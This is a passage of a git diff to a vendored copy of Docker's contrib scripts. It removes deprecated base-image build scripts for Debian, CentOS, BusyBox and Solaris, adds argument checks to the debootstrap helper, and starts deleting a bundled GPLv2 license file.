-e -ROOTFS=${TMPDIR:-/var/tmp}/rootfs-busybox-$$-$RANDOM -mkdir $ROOTFS -cd $ROOTFS - -mkdir bin etc dev dev/pts lib proc sys tmp -touch etc/resolv.conf -cp /etc/nsswitch.conf etc/nsswitch.conf -echo root:x:0:0:root:/:/bin/sh > etc/passwd -echo root:x:0: > etc/group -ln -s lib lib64 -ln -s bin sbin -cp $BUSYBOX bin -for X in $(busybox --list) -do - ln -s busybox bin/$X -done -rm bin/init -ln bin/busybox bin/init -cp /lib/x86_64-linux-gnu/lib{pthread,c,dl,nsl,nss_*}.so.* lib -cp /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 lib -for X in console null ptmx random stdin stdout stderr tty urandom zero -do - cp -a /dev/$X dev -done - -tar --numeric-owner -cf- . | docker import - busybox -docker run -i -u root busybox /bin/echo Success. diff --git a/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh b/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh deleted file mode 100755 index 412a5ce0a7..0000000000 --- a/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh +++ /dev/null @@ -1,297 +0,0 @@ -#!/usr/bin/env bash -set -e - -echo >&2 -echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/debootstrap' -echo >&2 - -variant='minbase' -include='iproute,iputils-ping' -arch='amd64' # intentionally undocumented for now -skipDetection= -strictDebootstrap= -justTar= - -usage() { - echo >&2 - - echo >&2 "usage: $0 [options] repo suite [mirror]" - - echo >&2 - echo >&2 'options: (not recommended)' - echo >&2 " -p set an http_proxy for debootstrap" - echo >&2 " -v $variant # change default debootstrap variant" - echo >&2 " -i $include # change default package includes" - echo >&2 " -d # strict debootstrap (do not apply any docker-specific tweaks)" - echo >&2 " -s # skip version detection and tagging (ie, precise also tagged as 12.04)" - echo >&2 " # note that this will also skip adding universe and/or security/updates to sources.list" - echo >&2 " -t # just create a tarball, especially for dockerbrew (uses repo as tarball name)" - - echo >&2 - echo >&2 " ie: $0 username/debian squeeze" - echo >&2 " $0 username/debian squeeze http://ftp.uk.debian.org/debian/" - - echo >&2 - echo >&2 " ie: $0 username/ubuntu precise" - echo >&2 " $0 username/ubuntu precise http://mirrors.melbourne.co.uk/ubuntu/" - - echo >&2 - echo >&2 " ie: $0 -t precise.tar.bz2 precise" - echo >&2 " $0 -t wheezy.tgz wheezy" - echo >&2 " $0 -t wheezy-uk.tar.xz wheezy http://ftp.uk.debian.org/debian/" - - echo >&2 -} - -# these should match the names found at http://www.debian.org/releases/ -debianStable=wheezy -debianUnstable=sid -# this should match the name found at http://releases.ubuntu.com/ -ubuntuLatestLTS=trusty -# this should match the name found at http://releases.tanglu.org/ -tangluLatest=aequorea - -while getopts v:i:a:p:dst name; do - case "$name" in - p) - http_proxy="$OPTARG" - ;; - v) - variant="$OPTARG" - ;; - i) - include="$OPTARG" - ;; - a) - arch="$OPTARG" - ;; - d) - strictDebootstrap=1 - ;; - s) - skipDetection=1 - ;; - t) - justTar=1 - ;; - ?) - usage - exit 0 - ;; - esac -done -shift $(($OPTIND - 1)) - -repo="$1" -suite="$2" -mirror="${3:-}" # stick to the default debootstrap mirror if one is not provided - -if [ ! "$repo" ] || [ ! "$suite" ]; then - usage - exit 1 -fi - -# some rudimentary detection for whether we need to "sudo" our docker calls -docker='' -if docker version > /dev/null 2>&1; then - docker='docker' -elif sudo docker version > /dev/null 2>&1; then - docker='sudo docker' -elif command -v docker > /dev/null 2>&1; then - docker='docker' -else - echo >&2 "warning: either docker isn't installed, or your current user cannot run it;" - echo >&2 " this script is not likely to work as expected" - sleep 3 - docker='docker' # give us a command-not-found later -fi - -# make sure we have an absolute path to our final tarball so we can still reference it properly after we change directory -if [ "$justTar" ]; then - if [ ! -d "$(dirname "$repo")" ]; then - echo >&2 "error: $(dirname "$repo") does not exist" - exit 1 - fi - repo="$(cd "$(dirname "$repo")" && pwd -P)/$(basename "$repo")" -fi - -# will be filled in later, if [ -z "$skipDetection" ] -lsbDist='' - -target="${TMPDIR:-/var/tmp}/docker-rootfs-debootstrap-$suite-$$-$RANDOM" - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" -returnTo="$(pwd -P)" - -if [ "$suite" = 'lucid' ]; then - # lucid fails and doesn't include gpgv in minbase; "apt-get update" fails - include+=',gpgv' -fi - -set -x - -# bootstrap -mkdir -p "$target" -sudo http_proxy=$http_proxy debootstrap --verbose --variant="$variant" --include="$include" --arch="$arch" "$suite" "$target" "$mirror" - -cd "$target" - -if [ -z "$strictDebootstrap" ]; then - # prevent init scripts from running during install/update - # policy-rc.d (for most scripts) - echo $'#!/bin/sh\nexit 101' | sudo tee usr/sbin/policy-rc.d > /dev/null - sudo chmod +x usr/sbin/policy-rc.d - # initctl (for some pesky upstart scripts) - sudo chroot . dpkg-divert --local --rename --add /sbin/initctl - sudo ln -sf /bin/true sbin/initctl - # see https://github.com/docker/docker/issues/446#issuecomment-16953173 - - # shrink the image, since apt makes us fat (wheezy: ~157.5MB vs ~120MB) - sudo chroot . apt-get clean - - if strings usr/bin/dpkg | grep -q unsafe-io; then - # while we're at it, apt is unnecessarily slow inside containers - # this forces dpkg not to call sync() after package extraction and speeds up install - # the benefit is huge on spinning disks, and the penalty is nonexistent on SSD or decent server virtualization - echo 'force-unsafe-io' | sudo tee etc/dpkg/dpkg.cfg.d/02apt-speedup > /dev/null - # we have this wrapped up in an "if" because the "force-unsafe-io" - # option was added in dpkg 1.15.8.6 - # (see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584254#82), - # and ubuntu lucid/10.04 only has 1.15.5.6 - fi - - # we want to effectively run "apt-get clean" after every install to keep images small (see output of "apt-get clean -s" for context) - { - aptGetClean='"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true";' - echo "DPkg::Post-Invoke { ${aptGetClean} };" - echo "APT::Update::Post-Invoke { ${aptGetClean} };" - echo 'Dir::Cache::pkgcache ""; Dir::Cache::srcpkgcache "";' - } | sudo tee etc/apt/apt.conf.d/no-cache > /dev/null - - # and remove the translations, too - echo 'Acquire::Languages "none";' | sudo tee etc/apt/apt.conf.d/no-languages > /dev/null - - # helpful undo lines for each the above tweaks (for lack of a better home to keep track of them): - # rm /usr/sbin/policy-rc.d - # rm /sbin/initctl; dpkg-divert --rename --remove /sbin/initctl - # rm /etc/dpkg/dpkg.cfg.d/02apt-speedup - # rm /etc/apt/apt.conf.d/no-cache - # rm /etc/apt/apt.conf.d/no-languages - - if [ -z "$skipDetection" ]; then - # see also rudimentary platform detection in hack/install.sh - lsbDist='' - if [ -r etc/lsb-release ]; then - lsbDist="$(. etc/lsb-release && echo "$DISTRIB_ID")" - fi - if [ -z "$lsbDist" ] && [ -r etc/debian_version ]; then - lsbDist='Debian' - fi - - case "$lsbDist" in - Debian) - # add the updates and security repositories - if [ "$suite" != "$debianUnstable" -a "$suite" != 'unstable' ]; then - # ${suite}-updates only applies to non-unstable - sudo sed -i "p; s/ $suite main$/ ${suite}-updates main/" etc/apt/sources.list - - # same for security updates - echo "deb http://security.debian.org/ $suite/updates main" | sudo tee -a etc/apt/sources.list > /dev/null - fi - ;; - Ubuntu) - # add the universe, updates, and security repositories - sudo sed -i " - s/ $suite main$/ $suite main universe/; p; - s/ $suite main/ ${suite}-updates main/; p; - s/ $suite-updates main/ ${suite}-security main/ - " etc/apt/sources.list - ;; - Tanglu) - # add the updates repository - if [ "$suite" = "$tangluLatest" ]; then - # ${suite}-updates only applies to stable Tanglu versions - sudo sed -i "p; s/ $suite main$/ ${suite}-updates main/" etc/apt/sources.list - fi - ;; - SteamOS) - # add contrib and non-free - sudo sed -i "s/ $suite main$/ $suite main contrib non-free/" etc/apt/sources.list - ;; - esac - fi - - # make sure our packages lists are as up to date as we can get them - sudo chroot . apt-get update - sudo chroot . apt-get dist-upgrade -y -fi - -if [ "$justTar" ]; then - # create the tarball file so it has the right permissions (ie, not root) - touch "$repo" - - # fill the tarball - sudo tar --numeric-owner -caf "$repo" . -else - # create the image (and tag $repo:$suite) - sudo tar --numeric-owner -c . | $docker import - $repo:$suite - - # test the image - $docker run -i -t $repo:$suite echo success - - if [ -z "$skipDetection" ]; then - case "$lsbDist" in - Debian) - if [ "$suite" = "$debianStable" -o "$suite" = 'stable' ] && [ -r etc/debian_version ]; then - # tag latest - $docker tag $repo:$suite $repo:latest - - if [ -r etc/debian_version ]; then - # tag the specific debian release version (which is only reasonable to tag on debian stable) - ver=$(cat etc/debian_version) - $docker tag $repo:$suite $repo:$ver - fi - fi - ;; - Ubuntu) - if [ "$suite" = "$ubuntuLatestLTS" ]; then - # tag latest - $docker tag $repo:$suite $repo:latest - fi - if [ -r etc/lsb-release ]; then - lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")" - if [ "$lsbRelease" ]; then - # tag specific Ubuntu version number, if available (12.04, etc.) - $docker tag $repo:$suite $repo:$lsbRelease - fi - fi - ;; - Tanglu) - if [ "$suite" = "$tangluLatest" ]; then - # tag latest - $docker tag $repo:$suite $repo:latest - fi - if [ -r etc/lsb-release ]; then - lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")" - if [ "$lsbRelease" ]; then - # tag specific Tanglu version number, if available (1.0, 2.0, etc.) - $docker tag $repo:$suite $repo:$lsbRelease - fi - fi - ;; - SteamOS) - if [ -r etc/lsb-release ]; then - lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")" - if [ "$lsbRelease" ]; then - # tag specific SteamOS version number, if available (1.0, 2.0, etc.) - $docker tag $repo:$suite $repo:$lsbRelease - fi - fi - ;; - esac - fi -fi - -# cleanup -cd "$returnTo" -sudo rm -rf "$target" diff --git a/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh b/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh deleted file mode 100755 index 7e0935062f..0000000000 --- a/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh +++ /dev/null @@ -1,123 +0,0 @@ -#!/usr/bin/env bash -# -# Create a base CentOS Docker image. - -# This script is useful on systems with rinse available (e.g., -# building a CentOS image on Debian). See contrib/mkimage-yum.sh for -# a way to build CentOS images on systems with yum installed. - -set -e - -echo >&2 -echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/rinse' -echo >&2 - -repo="$1" -distro="$2" -mirror="$3" - -if [ ! "$repo" ] || [ ! "$distro" ]; then - self="$(basename $0)" - echo >&2 "usage: $self repo distro [mirror]" - echo >&2 - echo >&2 " ie: $self username/centos centos-5" - echo >&2 " $self username/centos centos-6" - echo >&2 - echo >&2 " ie: $self username/slc slc-5" - echo >&2 " $self username/slc slc-6" - echo >&2 - echo >&2 " ie: $self username/centos centos-5 http://vault.centos.org/5.8/os/x86_64/CentOS/" - echo >&2 " $self username/centos centos-6 http://vault.centos.org/6.3/os/x86_64/Packages/" - echo >&2 - echo >&2 'See /etc/rinse for supported values of "distro" and for examples of' - echo >&2 ' expected values of "mirror".' - echo >&2 - echo >&2 'This script is tested to work with the original upstream version of rinse,' - echo >&2 ' found at http://www.steve.org.uk/Software/rinse/ and also in Debian at' - echo >&2 ' http://packages.debian.org/wheezy/rinse -- as always, YMMV.' - echo >&2 - exit 1 -fi - -target="${TMPDIR:-/var/tmp}/docker-rootfs-rinse-$distro-$$-$RANDOM" - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" -returnTo="$(pwd -P)" - -rinseArgs=( --arch amd64 --distribution "$distro" --directory "$target" ) -if [ "$mirror" ]; then - rinseArgs+=( --mirror "$mirror" ) -fi - -set -x - -mkdir -p "$target" - -sudo rinse "${rinseArgs[@]}" - -cd "$target" - -# rinse fails a little at setting up /dev, so we'll just wipe it out and create our own -sudo rm -rf dev -sudo mkdir -m 755 dev -( - cd dev - sudo ln -sf /proc/self/fd ./ - sudo mkdir -m 755 pts - sudo mkdir -m 1777 shm - sudo mknod -m 600 console c 5 1 - sudo mknod -m 600 initctl p - sudo mknod -m 666 full c 1 7 - sudo mknod -m 666 null c 1 3 - sudo mknod -m 666 ptmx c 5 2 - sudo mknod -m 666 random c 1 8 - sudo mknod -m 666 tty c 5 0 - sudo mknod -m 666 tty0 c 4 0 - sudo mknod -m 666 urandom c 1 9 - sudo mknod -m 666 zero c 1 5 -) - -# effectively: febootstrap-minimize --keep-zoneinfo --keep-rpmdb --keep-services "$target" -# locales -sudo rm -rf usr/{{lib,share}/locale,{lib,lib64}/gconv,bin/localedef,sbin/build-locale-archive} -# docs and man pages -sudo rm -rf usr/share/{man,doc,info,gnome/help} -# cracklib -sudo rm -rf usr/share/cracklib -# i18n -sudo rm -rf usr/share/i18n -# yum cache -sudo rm -rf var/cache/yum -sudo mkdir -p --mode=0755 var/cache/yum -# sln -sudo rm -rf sbin/sln -# ldconfig -#sudo rm -rf sbin/ldconfig -sudo rm -rf etc/ld.so.cache var/cache/ldconfig -sudo mkdir -p --mode=0755 var/cache/ldconfig - -# allow networking init scripts inside the container to work without extra steps -echo 'NETWORKING=yes' | sudo tee etc/sysconfig/network > /dev/null - -# to restore locales later: -# yum reinstall glibc-common - -version= -if [ -r etc/redhat-release ]; then - version="$(sed -E 's/^[^0-9.]*([0-9.]+).*$/\1/' etc/redhat-release)" -elif [ -r etc/SuSE-release ]; then - version="$(awk '/^VERSION/ { print $3 }' etc/SuSE-release)" -fi - -if [ -z "$version" ]; then - echo >&2 "warning: cannot autodetect OS version, using $distro as tag" - sleep 20 - version="$distro" -fi - -sudo tar --numeric-owner -c . | docker import - $repo:$version - -docker run -i -t $repo:$version echo success - -cd "$returnTo" -sudo rm -rf "$target" diff --git a/vendor/github.com/docker/docker/contrib/mkimage-yum.sh b/vendor/github.com/docker/docker/contrib/mkimage-yum.sh index 29da170480..901280451b 100755 --- a/vendor/github.com/docker/docker/contrib/mkimage-yum.sh +++ b/vendor/github.com/docker/docker/contrib/mkimage-yum.sh @@ -81,13 +81,13 @@ fi if [[ -n "$install_groups" ]]; then yum -c "$yum_config" --installroot="$target" --releasever=/ --setopt=tsflags=nodocs \ - --setopt=group_package_types=mandatory -y groupinstall $install_groups + --setopt=group_package_types=mandatory -y groupinstall "$install_groups" fi if [[ -n "$install_packages" ]]; then yum -c "$yum_config" --installroot="$target" --releasever=/ --setopt=tsflags=nodocs \ - --setopt=group_package_types=mandatory -y install $install_packages + --setopt=group_package_types=mandatory -y install "$install_packages" fi yum -c "$yum_config" --installroot="$target" -y clean all diff --git a/vendor/github.com/docker/docker/contrib/mkimage.sh b/vendor/github.com/docker/docker/contrib/mkimage.sh index 13298c8036..ae05d139c3 100755 --- a/vendor/github.com/docker/docker/contrib/mkimage.sh +++ b/vendor/github.com/docker/docker/contrib/mkimage.sh @@ -11,7 +11,6 @@ usage() { echo >&2 " $mkimg -t someuser/centos:5 rinse --distribution centos-5" echo >&2 " $mkimg -t someuser/mageia:4 mageia-urpmi --version=4" echo >&2 " $mkimg -t someuser/mageia:4 mageia-urpmi --version=4 --mirror=http://somemirror/" - echo >&2 " $mkimg -t someuser/solaris solaris" exit 1 } @@ -20,13 +19,6 @@ scriptDir="$(dirname "$(readlink -f "$BASH_SOURCE")")/mkimage" os= os=$(uname -o) -# set up path to gnu tools if solaris -[[ $os == "Solaris" ]] && export PATH=/usr/gnu/bin:$PATH -# TODO check for gnu-tar, gnu-getopt - -# TODO requires root/sudo due to some pkg operations. sigh. -[[ $os == "Solaris" && $EUID != "0" ]] && echo >&2 "image create on Solaris requires superuser privilege" - optTemp=$(getopt --options '+d:t:c:hC' --longoptions 'dir:,tag:,compression:,no-compression,help' --name "$mkimg" -- "$@") eval set -- "$optTemp" unset optTemp diff --git a/vendor/github.com/docker/docker/contrib/mkimage/debootstrap b/vendor/github.com/docker/docker/contrib/mkimage/debootstrap index 7d56d8ea9f..9f7d8987ad 100755 --- a/vendor/github.com/docker/docker/contrib/mkimage/debootstrap +++ b/vendor/github.com/docker/docker/contrib/mkimage/debootstrap @@ -1,7 +1,21 @@ #!/usr/bin/env bash set -e +mkimgdeb="$(basename "$0")" +mkimg="$(dirname "$0").sh" + +usage() { + echo >&2 "usage: $mkimgdeb rootfsDir suite [debootstrap-args]" + echo >&2 " note: $mkimgdeb meant to be used from $mkimg" + exit 1 +} + rootfsDir="$1" +if [ -z "$rootfsDir" ]; then + echo >&2 "error: rootfsDir is missing" + echo >&2 + usage +fi shift # we have to do a little fancy footwork to make sure "rootfsDir" becomes the second non-option argument to debootstrap @@ -13,10 +27,21 @@ while [ $# -gt 0 ] && [[ "$1" == -* ]]; do done suite="$1" +if [ -z "$suite" ]; then + echo >&2 "error: suite is missing" + echo >&2 + usage +fi shift # get path to "chroot" in our current PATH -chrootPath="$(type -P chroot)" +chrootPath="$(type -P chroot || :)" +if [ -z "$chrootPath" ]; then + echo >&2 "error: chroot not found. Are you root?" + echo >&2 + usage +fi + rootfs_chroot() { # "chroot" doesn't set PATH, so we need to set it explicitly to something our new debootstrap chroot can use appropriately! @@ -168,7 +193,7 @@ if [ -z "$DONT_TOUCH_SOURCES_LIST" ]; then case "$lsbDist" in debian) # updates and security! - if [ "$suite" != 'sid' -a "$suite" != 'unstable' ]; then + if curl -o /dev/null -s --head --fail "http://security.debian.org/dists/$suite/updates/main/binary-$(rootfs_chroot dpkg --print-architecture)/Packages.gz"; then ( set -x sed -i " diff --git a/vendor/github.com/docker/docker/contrib/mkimage/solaris b/vendor/github.com/docker/docker/contrib/mkimage/solaris deleted file mode 100755 index 158970e69e..0000000000 --- a/vendor/github.com/docker/docker/contrib/mkimage/solaris +++ /dev/null @@ -1,89 +0,0 @@ -#!/usr/bin/env bash -# -# Solaris 12 base image build script. -# -set -e - -# TODO add optional package publisher origin - -rootfsDir="$1" -shift - -# base install -( - set -x - - pkg image-create --full --zone \ - --facet facet.locale.*=false \ - --facet facet.locale.POSIX=true \ - --facet facet.doc=false \ - --facet facet.doc.*=false \ - "$rootfsDir" - - pkg -R "$rootfsDir" set-property use-system-repo true - - pkg -R "$rootfsDir" set-property flush-content-cache-on-success true - - pkg -R "$rootfsDir" install core-os -) - -# Lay in stock configuration, set up milestone -# XXX This all may become optional in a base image -( - # faster to build repository database on tmpfs - REPO_DB=/system/volatile/repository.$$ - export SVCCFG_REPOSITORY=${REPO_DB} - export SVCCFG_DOOR_PATH=$rootfsDir/system/volatile/tmp_repo_door - - # Import base manifests. NOTE These are a combination of basic requirement - # and gleaned from container milestone manifest. They may change. - for m in $rootfsDir/lib/svc/manifest/system/environment.xml \ - $rootfsDir/lib/svc/manifest/system/svc/global.xml \ - $rootfsDir/lib/svc/manifest/system/svc/restarter.xml \ - $rootfsDir/lib/svc/manifest/network/dns/client.xml \ - $rootfsDir/lib/svc/manifest/system/name-service/switch.xml \ - $rootfsDir/lib/svc/manifest/system/name-service/cache.xml \ - $rootfsDir/lib/svc/manifest/milestone/container.xml ; do - svccfg import $m - done - - # Apply system layer profile, deleting unnecessary dependencies - svccfg apply $rootfsDir/etc/svc/profile/generic_container.xml - - # XXX Even if we keep a repo in the base image, this is definitely optional - svccfg apply $rootfsDir/etc/svc/profile/sysconfig/container_sc.xml - - for s in svc:/system/svc/restarter \ - svc:/system/environment \ - svc:/network/dns/client \ - svc:/system/name-service/switch \ - svc:/system/name-service/cache \ - svc:/system/svc/global \ - svc:/milestone/container ;do - svccfg -s $s refresh - done - - # now copy the built up repository into the base rootfs - mv $REPO_DB $rootfsDir/etc/svc/repository.db -) - -# pkg(1) needs the zoneproxy-client running in the container. -# use a simple wrapper to run it as needed. -# XXX maybe we go back to running this in SMF? -mv "$rootfsDir/usr/bin/pkg" "$rootfsDir/usr/bin/wrapped_pkg" -cat > "$rootfsDir/usr/bin/pkg" <<-'EOF' -#!/bin/sh -# -# THIS FILE CREATED DURING DOCKER BASE IMAGE CREATION -# -# The Solaris base image uses the sysrepo proxy mechanism. The -# IPS client pkg(1) requires the zoneproxy-client to reach the -# remote publisher origins through the host. This wrapper script -# enables and disables the proxy client as needed. This is a -# temporary solution. - -/usr/lib/zones/zoneproxy-client -s localhost:1008 -PKG_SYSREPO_URL=http://localhost:1008 /usr/bin/wrapped_pkg "$@" -pkill -9 zoneproxy-client -EOF -chmod +x "$rootfsDir/usr/bin/pkg" diff --git a/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh b/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh index 5eeb45c8bd..3d2f49e869 100755 --- a/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh +++ b/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh @@ -1,4 +1,4 @@ -#!/bin/sh +#!/usr/bin/env bash set -e dir="$1" diff --git a/vendor/github.com/docker/docker/contrib/project-stats.sh b/vendor/github.com/docker/docker/contrib/project-stats.sh deleted file mode 100755 index 2691c72ffb..0000000000 --- a/vendor/github.com/docker/docker/contrib/project-stats.sh +++ /dev/null @@ -1,22 +0,0 @@ -#!/usr/bin/env bash - -## Run this script from the root of the docker repository -## to query project stats useful to the maintainers. -## You will need to install `pulls` and `issues` from -## https://github.com/crosbymichael/pulls - -set -e - -echo -n "Open pulls: " -PULLS=$(pulls | wc -l); let PULLS=$PULLS-1 -echo $PULLS - -echo -n "Pulls alru: " -pulls alru - -echo -n "Open issues: " -ISSUES=$(issues list | wc -l); let ISSUES=$ISSUES-1 -echo $ISSUES - -echo -n "Issues alru: " -issues alru diff --git a/vendor/github.com/docker/docker/contrib/reprepro/suites.sh b/vendor/github.com/docker/docker/contrib/reprepro/suites.sh deleted file mode 100755 index 9ecf99d465..0000000000 --- a/vendor/github.com/docker/docker/contrib/reprepro/suites.sh +++ /dev/null @@ -1,12 +0,0 @@ -#!/bin/bash -set -e - -cd "$(dirname "$BASH_SOURCE")/../.." - -targets_from() { - git fetch -q https://github.com/docker/docker.git "$1" - git ls-tree -r --name-only "$(git rev-parse FETCH_HEAD)" contrib/builder/deb/ | grep '/Dockerfile$' | sed -r 's!^contrib/builder/deb/|^contrib/builder/deb/amd64/|-debootstrap|/Dockerfile$!!g' | grep -v / -} - -release_branch=$(git ls-remote --heads https://github.com/docker/docker.git | awk -F 'refs/heads/' '$2 ~ /^release/ { print $2 }' | sort -V | tail -1) -{ targets_from master; targets_from "$release_branch"; } | sort -u diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE deleted file mode 100644 index d511905c16..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE +++ /dev/null @@ -1,339 +0,0 @@ - GNU GENERAL PUBLIC LICENSE - Version 2, June 1991 - - Copyright (C) 1989, 1991 Free Software Foundation, Inc., - 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The licenses for most software are designed to take away your -freedom to share and change it. By contrast, the GNU General Public -License is intended to guarantee your freedom to share and change free -software--to make sure the software is free for all its users. This -General Public License applies to most of the Free Software -Foundation's software and to any other program whose authors commit to -using it. (Some other Free Software Foundation software is covered by -the GNU Lesser General Public License instead.) You can apply it to -your programs, too. - - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -this service if you wish), that you receive source code or can get it -if you want it, that you can change the software or use pieces of it -in new free programs; and that you know you can do these things. - - To protect your rights, we need to make restrictions that forbid -anyone to deny you these rights or to ask you to surrender the rights. -These restrictions translate to certain responsibilities for you if you -distribute copies of the software, or if you modify it. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must give the recipients all the rights that -you have. You must make sure that they, too, receive or can get the -source code. And you must show them these terms so they know their -rights. - - We protect your rights with two steps: (1) copyright the software, and -(2) offer you this license which gives you legal permission to copy, -distribute and/or modify the software. - - Also, for each author's protection and ours, we want to make certain -that everyone understands that there is no warranty for this free -software. If the software is modified by someone else and passed on, we -want its recipients to know that what they have is not the original, so -that any problems introduced by others will not reflect on the original -authors' reputations. - - Finally, any free program is threatened constantly by software -patents. We wish to avoid the danger that redistributors of a free -program will individually obtain patent licenses, in effect making the -program proprietary. To prevent this, we have made it clear that any -patent must be licensed for everyone's free use or not licensed at all. - - The precise terms and conditions for copying, distribution and -modification follow. - - GNU GENERAL PUBLIC LICENSE - TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION - - 0. This License applies to any program or other work which contains -a notice placed by the copyright holder saying it may be distributed -under the terms of this General Public License. The "Program", below, -refers to any such program or work, and a "work based on the Program" -means either the Program or any derivative work under copyright law: -that is to say, a work containing the Program or a portion of it, -either verbatim or with modifications and/or translated into another -language. (Hereinafter, translation is included without limitation in -the term "modification".) Each licensee is addressed as "you". - -Activities other than copying, distribution and modification are not -covered by this License; they are outside its scope. The act of -running the Program is not restricted, and the output from the Program -is covered only if its contents constitute a work based on the -Program (independent of having been made by running the Program). -Whether that is true depends on what the Program does. - - 1. You may copy and distribute verbatim copies of the Program's -source code as you receive it, in any medium, provided that you -conspicuously and appropriately publish on each copy an appropriate -copyright notice and disclaimer of warranty; keep intact all the -notices that refer to this License and to the absence of any warranty; -and give any other recipients of the Program a copy of this License -along with the Program. - -You may charge a fee for the physical act of transferring a copy, and -you may at your option offer warranty protection in exchange for a fee. - - 2. You may modify your copy or copies of the Program or any portion -of it, thus forming a work based on the Program, and copy and -distribute such modifications or work under the terms of Section 1 -above, provided that you also meet all of these conditions: - - a) You must cause the modified files to carry prominent notices - stating that you changed the files and the date of any change. - - b) You must cause any work that you distribute or publish, that in - whole or in part contains or is derived from the Program or any - part thereof, to be licensed as a whole at no charge to all third - parties under the terms of this License. - - c) If the modified program normally reads commands interactively - when run, you must cause it, when started running for such - interactive use in the most ordinary way, to print or display an - announcement including an appropriate copyright notice and a - notice that there is no warranty (or else, saying that you provide - a warranty) and that users may redistribute the program under - these conditions, and telling the user how to view a copy of this - License. (Exception: if the Program itself is interactive but - does not normally print such an announcement, your work based on - the Program is not required to print an announcement.) - -These requirements apply to the modified work as a whole. If -identifiable sections of that work are not derived from the Program, -and can be reasonably considered independent and separate works in -themselves, then this License, and its terms, do not apply to those -sections when you distribute them as separate works. But when you -distribute the same sections as part of a whole which is a work based -on the Program, the distribution of the whole must be on the terms of -this License, whose permissions for other licensees extend to the -entire whole, and thus to each and every part regardless of who wrote it. - -Thus, it is not the intent of this section to claim rights or contest -your rights to work written entirely by you; rather, the intent is to -exercise the right to control the distribution of derivative or -collective works based on the Program. - -In addition, mere aggregation of another work not based on the Program -with the Program (or with a work based on the Program) on a volume of -a storage or distribution medium does not bring the other work under -the scope of this License. - - 3. You may copy and distribute the Program (or a work based on it, -under Section 2) in object code or executable form under the terms of -Sections 1 and 2 above provided that you also do one of the following: - - a) Accompany it with the complete corresponding machine-readable - source code, which must be distributed under the terms of Sections - 1 and 2 above on a medium customarily used for software interchange; or, - - b) Accompany it with a written offer, valid for at least three - years, to give any third party, for a charge no more than your - cost of physically performing source distribution, a complete - machine-readable copy of the corresponding source code, to be - distributed under the terms of Sections 1 and 2 above on a medium - customarily used for software interchange; or, - - c) Accompany it with the information you received as to the offer - to distribute corresponding source code. (This alternative is - allowed only for noncommercial distribution and only if you - received the program in object code or executable form with such - an offer, in accord with Subsection b above.) - -The source code for a work means the preferred form of the work for -making modifications to it. For an executable work, complete source -code means all the source code for all modules it contains, plus any -associated interface definition files, plus the scripts used to -control compilation and installation of the executable. However, as a -special exception, the source code distributed need not include -anything that is normally distributed (in either source or binary -form) with the major components (compiler, kernel, and so on) of the -operating system on which the executable runs, unless that component -itself accompanies the executable. - -If distribution of executable or object code is made by offering -access to copy from a designated place, then offering equivalent -access to copy the source code from the same place counts as -distribution of the source code, even though third parties are not -compelled to copy the source along with the object code. - - 4. You may not copy, modify, sublicense, or distribute the Program -except as expressly provided under this License. Any attempt -otherwise to copy, modify, sublicense or distribute the Program is -void, and will automatically terminate your rights under this License. -However, parties who have received copies, or rights, from you under -this License will not have their licenses terminated so long as such -parties remain in full compliance. - - 5. You are not required to accept this License, since you have not -signed it. However, nothing else grants you permission to modify or -distribute the Program or its derivative works. These actions are -prohibited by law if you do not accept this License. Therefore, by -modifying or distributing the Program (or any work based on the -Program), you indicate your acceptance of this License to do so, and -all its terms and conditions for copying, distributing or modifying -the Program or works based on it. - - 6. Each time you redistribute the Program (or any work based on the -Program), the recipient automatically receives a license from the -original licensor to copy, distribute or modify the Program subject to -these terms and conditions. You may not impose any further -restrictions on the recipients' exercise of the rights granted herein. -You are not responsible for enforcing compliance by third parties to -this License. - - 7. If, as a consequence of a court judgment or allegation of patent -infringement or for any other reason (not limited to patent issues), -conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot -distribute so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you -may not distribute the Program at all. For example, if a patent -license would not permit royalty-free redistribution of the Program by -all those who receive copies directly or indirectly through you, then -the only way you could satisfy both it and this License would be to -refrain entirely from distribution of the Program. - -If any portion of this section is held invalid or unenforceable under -any particular circumstance, the balance of the section is intended to -apply and the section as a whole is intended to apply in other -circumstances. - -It is not the purpose of this section to induce you to infringe any -patents or other property right claims or to contest validity of any -such claims; this section has the sole purpose of protecting the -integrity of the free software distribution system, which is -implemented by public license practices. Many people have made -generous contributions to the wide range of software distributed -through that system in reliance on consistent application of that -system; it is up to the author/donor to decide if he or she is willing -to distribute software through any other system and a licensee cannot -impose that choice. - -This section is intended to make thoroughly clear what is believed to -be a consequence of the rest of this License. - - 8. If the distribution and/or use of the Program is restricted in -certain countries either by patents or by copyrighted interfaces, the -original 